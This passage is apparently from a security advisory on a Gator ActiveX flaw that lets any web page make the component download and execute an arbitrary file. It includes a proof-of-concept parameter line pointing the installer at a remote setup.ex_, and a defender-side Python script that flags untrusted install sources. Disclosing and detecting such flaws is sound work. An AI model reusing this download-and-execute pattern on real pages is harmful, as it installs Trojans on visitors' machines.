The issue here is that any HTML page can specify the location of the Gator installation file. The installation file is downloaded, and then its filename is checked. If the filename is setup.ex_, the file is decompressed and executed; if the file is not compressed, it is still executed. Using this method, a malicious user can easily create an HTML page that uses the rogue ActiveX component to point at a Trojan file.
(NOTE: The 'o' of object has been replaced with a '0' to prevent execution)
<param name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">
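A defender-side check for the pattern described above, as an added example that is not part of the original advisory: it scans HTML for a "params" parameter requesting fcn=setup and reports any src whose host is not on an allowlist, and it shows that a filename comparison alone accepts the same src. TRUSTED_HOSTS and its value are assumed placeholders, the function names are hypothetical, and the sample pages are constructed (the first reuses the src value shown above).

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Assumption: hosts the installer is legitimately served from (placeholder value).
TRUSTED_HOSTS = {"downloads.vendor.example"}

class ParamFinder(HTMLParser):
    """Collects the value of every <param name="params" ...> tag."""
    def __init__(self):
        super().__init__()
        self.values = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "param" and (a.get("name") or "").lower() == "params":
            self.values.append(a.get("value") or "")

def src_host(src):
    """Host part of src, which the page shows written without a scheme."""
    rest = src.split("://", 1)[-1]
    return rest.split("/", 1)[0].split(":", 1)[0].lower()

def filename_only_check(src):
    """Compare just the file name to setup.ex_, ignoring where it came from."""
    return src.rsplit("/", 1)[-1].lower() == "setup.ex_"

def find_untrusted_installs(html):
    """Return src values of fcn=setup requests whose host is not trusted."""
    finder = ParamFinder()
    finder.feed(html)
    hits = []
    for value in finder.values:
        query = parse_qs(value, keep_blank_values=True)
        if "setup" in query.get("fcn", []):
            hits += [s for s in query.get("src", [])
                     if src_host(s) not in TRUSTED_HOSTS]
    return hits

# Constructed sample pages.
ROGUE_PAGE = ('<param name="params" value="fcn=setup&src=eyeonsecurity.net/'
              'advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0">')
TRUSTED_PAGE = ('<param name="params" '
                'value="fcn=setup&src=downloads.vendor.example/setup.ex_">')

if __name__ == "__main__":
    for name, page in (("rogue", ROGUE_PAGE), ("trusted", TRUSTED_PAGE)):
        print(name, find_untrusted_installs(page))
```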